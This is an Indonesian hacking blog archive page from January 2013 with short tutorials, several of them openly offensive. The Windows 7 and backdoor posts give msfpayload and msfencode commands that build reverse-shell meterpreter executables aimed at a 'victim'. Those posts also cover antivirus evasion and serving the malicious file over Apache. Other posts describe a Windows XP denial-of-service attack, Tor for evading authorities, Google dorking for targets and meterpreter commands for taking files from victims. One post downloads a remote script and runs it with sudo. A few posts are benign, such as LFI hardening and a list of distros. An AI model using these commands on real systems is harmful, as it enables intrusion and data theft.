Posts

Showing posts from January, 2013

exploit windows 7

Image
  hari ini saya akan menulis tutorial sederhana untuk membuat eksploitasi untuk Windows 7 dan semua Windows . Semua orang cinta dan seperti cara sederhana bukan ) dan? Bagaimana kita terhubung ke Windows 7 korban yang sudah dieksekusi sederhana saya menggunakan Backtrack 5 R2 dengan Metasploit Framework 4.2.0 , dan alamat IP saya adalah 192.168.8.91 1.Buka terminal dan ketikkan perintah  msfpayload windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 x > Desktop/Dvil.exe ganti tulisan merah dengan ip kamu Perintah diatas akan membuat file eksekusi Windows dengan nama "Dvil .exe" dan akan disimpan di desktop Anda. 2. Sekarang kamu harus menyalin " Dvil .exe " yang baru dibuat untuk 7 sistem windows.sebenarnya banyak langkah dan cara untuk mengeksekusi nya  disini kita menggunakan cara sangat simple. Jika Anda tidak tahu bagaimana untuk berbagi folder di backtrack ,Kamu dapat  melihat nya di  Disini 3. Langka

cara share folder di backtrack

Image
Saya pikir orang ini memiliki masalah yang sama dengan saya ( lama) saat ingin mengirim file berbahaya dari mesin Backtrack saya untuk tujuan pengujian kepada korban mesin Windows saya :-). Sebenarnya ada banyak cara untuk melakukan ini, tapi saya hanya akan menjelaskan sangat ... sangat .. benar-benar sederhana 1.buka terminal tekan (ctrl + alt +T) dan kemudian jalankan perintah ini untuk membuat direktori "berbagi" baru. ketikkan perintah mkdir /var/www/share chmod -R 755 /var/www/share/ chown -R www-data:www-data /var/www/share/       Dan lihat hasilnya di web browser ketikkan IP kamu /share

memasang backdooor di windows

Image
Sebenarnya simple sekali purpose dan tutorial ini, membuat malicious URL seperti yang dilakukan SET secara manual dan menempatkan backdoor sesuai dengan keinginan kita. Karena secara default backdoor yagn di buat oleh malicious java server seperti rhinno dan java_signed_applet biasanya merupakan backdoor biasa yang mudah sekali di block antivirus ... Ide yang baik sekali untuk memodifikasi file exe.rb dimana backdoor yang di packing dengan ekstensi java "jar" dapat diarahkan sesuai dengan backdoor yang telah kita kombinasikan dengan "msfencode" Tutorial ini sana buat dengan Backtrack .. sekali lagi anda tinggal menyesuaikan dengan path metasploit dan direktori anda .. karena pada dasarnya semua OS yang terinstall metasploit msf adalah sama ... Pertama-tama kita buat backdoor untuk bypass av seperti avg,avira,avast dll ketikkan perintah sebagai berikut root@dvildance:/# msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.4 PORT=4444R |

DOS windows XP

Image
Mengerikan memang.. saya udah di test. keinget waktu ngerjain orang ngent..hahahaha.. gimana kronologisnya xixixxi exploit ini berlaku pada windows pada serials di bawah ini .. Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional x64 Edition Microsoft Windows XP Profesional SP2 Microsoft Windows XP Professional SP1 Microsoft Windows XP Professional Microsoft Windows XP Media Center Edition SP2 Microsoft Windows XP Media Center Edition SP1 Microsoft Windows XP Media Center Edition Microsoft Windows XP Home SP2 Microsoft Windows XP Home SP1 Microsoft Windows XP Home Microsoft Windows XP Emas 0 Microsoft Windows XP Embedded SP1 Microsoft Windows XP Embedded Microsoft Windows XP 64-bit Edition Versi 2003 SP1 Microsoft Windows XP 64-bit Edition 2003 Versi Microsoft Windows XP 64-bit Edition SP1 Microsoft Windows XP 64-bit Microsoft Windows XP 0 Microsoft Win

11 distro untuk kebutuhan pentester ato hacking

Image
Top Ten Penetrasi Pengujian Distribusi Linux 18 Balasan BackTrack adalah distribusi linux yang paling populer pentesting di pasar hari ini, tetapi ada orang lain! Setiap Keamanan Informasi profesional perlu untuk bekerja dengan distro pentesting dan pelatihan yang paling mengharuskan Anda bekerja bersama alat yang digunakan dalam sebuah distro. Update: Karena beberapa komentar besar di bawah ini kita mengedit posting ini jadi sekarang menjadi 11 12 Distro Linux Terbaik Penetrasi itu. OK, tidak ada distribusi pentesting berikut berada di daftar top 100 selama di Tonton Distro tapi kami tidak peduli - kita berbicara tentang alat pengujian penetrasi - atau secara khusus penciptaan distro yang memiliki semua alat yang diperlukan sumber terbuka yang membantu etis hacker dan penguji penetrasi melakukan pekerjaan mereka. Seperti segala sesuatu yang lain ketika datang ke pilihan, setiap distro pentesting memiliki pro, kontra dan khusus. Beberapa di

Mencegah serangan LFI vuln di web kita

Image
di sini saya akan memberikan sedikit clue or beberapa tips untuk mencegah Local File Inclusion Vulnerability in our website langsung saja ini beberapa tips to handle local fie inclusion : ==================================== -=[1]=- via .htaccess file Put following in .htaccess and put it in the appropriate directory ==================================== # Sample '.htaccess' file for 'pub' subdirectory # Allow all access Allow from all # Deny people from looking at the index and running SSI and CGI Options None # If you have PHP4 or PHP5 installed make sure the directive # below is enabled. If you do not have PHP installed you will # need to comment out the directory below to avoid errors: php_flag engine off # If you have PHP3 installed make sure the directive below is # enabled: #php3_engine off # This line will redefine the mime type for the most common # types of scripts. It will also deliver HTML files as if they # are text files: Add

internet aman dengan tor dan konfigurasikan tor

Image
Diasumsikan bahwa Anda adalah seorang hacker lintas negara, Anda dituntut oleh diri Anda sendiri untuk dapat mengamankan aktivitas online Anda dari campur tangan pihak lain utamanya pemerintah yang berwenang yang sewaktu-waktu dapat mengetahui keberadaan Anda dan menjebloskan Anda ke dalam penjara. The Onion Router atau TOR adalah server yang membuat pengguna menjadi anonim dalam internet. TOR berfungsi menyembunyikan pengguna internet. Orang yang menggunakan jaringan tor menggunakan jaringan onion routers . Hal ini membuat lokasi pengguna tetap rahasia. ( Wikipedia ) Untuk dapat mengamankan aktivitas online Anda, paling tidak Anda harus melakukan chain atau melompat dari satu IP publik ke IP publik lainnya agar tidak terendus, semakin banyak IP yang Anda lompati maka semakin sulit pula untuk Anda terendus oleh pemerintah. Ada banyak cara untuk menyamarkan IP Anda, salah satunya dengan proxy server eksternal atau VPN yang Anda percayai. Tentunya hal seperti ini tidak

memanfaatkan mesin pencari di google

Image
mungkin pada tau yg beginian atou mungkin blm ada yg tau... so to the point aj ya...! berikut tutornya Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari ribuan website tampilan utamanya berubah. Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik dengan menggunakan Google. 01. Penggunaan Dasar - Google tidak "case sensitive". Keyword: linux = LINUX = LiNuX, Akan menghasilkan hal yang sama - AND: Secara Default Google menggunakan keyword and. Keyword: menjadi hacker Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker" - OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah satu dari keyword. Note: OR dituliskan dengan huruf besar semua. Keyword: hacker OR cracker Hasilnya pencarian akan mengandung kata &quo

Cara Membuat Bootable Linux Di USB Flashdisk

Image
Mungkin sudah biasa apabila Linux yang tidak ingin di install pada PC/komputer/laptop kita menggunakan Live CD yang bisa langsung pakai layaknya linux yang sudah di install. Namun, terkadang menggunakan Live CD memiliki beberapa kekurangan yaitu harus tersedianya CD Room untuk membaca Live CD yang kita punya tersebut. Disini, saya akan sedikit sharing tentang bagaimana membuat bootable Linux di usb flashdisk agar kita dapat lebih praktis menggunakan distro yang ingin dicoba-coba dulu sebelum di instal. Fungsi dari bootable Linux di flashdisk ini tidak jauh berbeda dengan Live CD, tetapi memiliki berbagai kelebihan dari sisi kepraktisannya. Langkah-langkah persiapan untuk membuat bootable Linux di usb flashdisk 1. Siapkan Flashdisk yang akan dijadikan tempat bootable Linuxnya, ukuran menyesuaikan dari file ISO yang akan di gunakan. (disini saya menggunakan flashdisk ukuran 4GB) 2. Siapkan file ISO Linux yang akan dipindah kedalam flashdisk. (disini saya menggunakan Ba

Upgrade kernel ke 3.6.10

Image
Upgrade ini bisa digunakan di BT R- , Ubuntu ,Linux -...oke langsung saja ketik kode berikut di terminal secara ber urut.. a.  cd /tmp b.  wget http://dl.dropbox.com/u/47950494/upubuntu.com/linux-kernel-3.6.10 -O linux-kernel-3.6.10 c.  chmod +x linux-kernel-3.6.10 d.  sudo sh linux-kernel-3.6.10 e.  sudo reboot Dan perintah berikut untuk menghapus perintah awal : sudo apt-get purge linux-image-3.6.10*

Dnsmap

Image
apa itu dnsmap ? nah dnsmap itu adalah sebuah maping sub domain, misale seperti kita ketahui yahoo.com terdapat berbagai subdomain seprti mail.yahoo.com dan web yg lain... Okeh, kali ini saya akan memberikan cara mapping DNS, langkah pertama buka terminal ketik cd /pentest/enumeration/dns/dnsmap lalu untuk proses mappingnya, gunakan perintah ./dnsmap  website pada perintah "website" dirubah dengan nama website yg ingin kalian dsnmap contoh ./dnsmap uny.ac.id.. berikut ss nya..

PERINTAH DASAR METASPLOIT

Image
Buat yang sering menggunkan Metasploit pasti sudah sering menggunakan beberapa perintah dibawah ini ketika sudah mendapatkan meterpreter, jadi buat yang ingin mendalami Metasploit, ini adalah wajib untuk dipelajari,termasuk ane,hoho.. 1. help Perintah ' help ' akan menampilkan menu help pada terminal. 2. background Perintah ' background ' mengembalikan kita kepada prompt msf/prompt sebelum exploit dijalankan. 3. ps Perintah ' ps ' digunakan untuk menampilkan proses yang sedang berjalan. 4. migate Perintah ' migrate ' digunakan untuk berpindah pada proses yang lain. 5. ls Perintah ' ls ' digunakan untuk menampilkan daftar file dari sebuah folder tempat kita berada. 6. download Perintah ' download ' adalah untuk mendownload file dari komputer korban, dan gunakan double-slashes ( \\ )untuk menetapkan direktori. 7. upload Perintah ' upload ' adalah untuk mengupload file kedalam komputer korban(biasan

Template blog terbaru .....wkwkwkwkk

Image
Download Template Blogger Terbaru 2012 Gratis   – Anda dapat mendownload kumpulan template blogger yang keren dan gratis disini. Mulai dari template blogspot transparent , magazine , template 3 kolom terbaik sampai template toko online . Pokoknya kali ini khusus saya pilihkan template blogspot yang unik dan keren . Jadi buat yang mau ganti template silahkan dicek dulu demonya, kalau udah sip langsung download aja yach…!! 1. X10 Masonry Blogger Template Demo   |  Download 2. WP Openchart Blogger Template Demo   |  Download 3. Buttermaker Blogger Template Demo   |  Download 4. MagPress Blogger Template Demo   |  Download 5. X5 Shadow Blogger Template Demo   |  Download 6. Simplex eshop Blogger Template (Toko Online) Demo   |  Download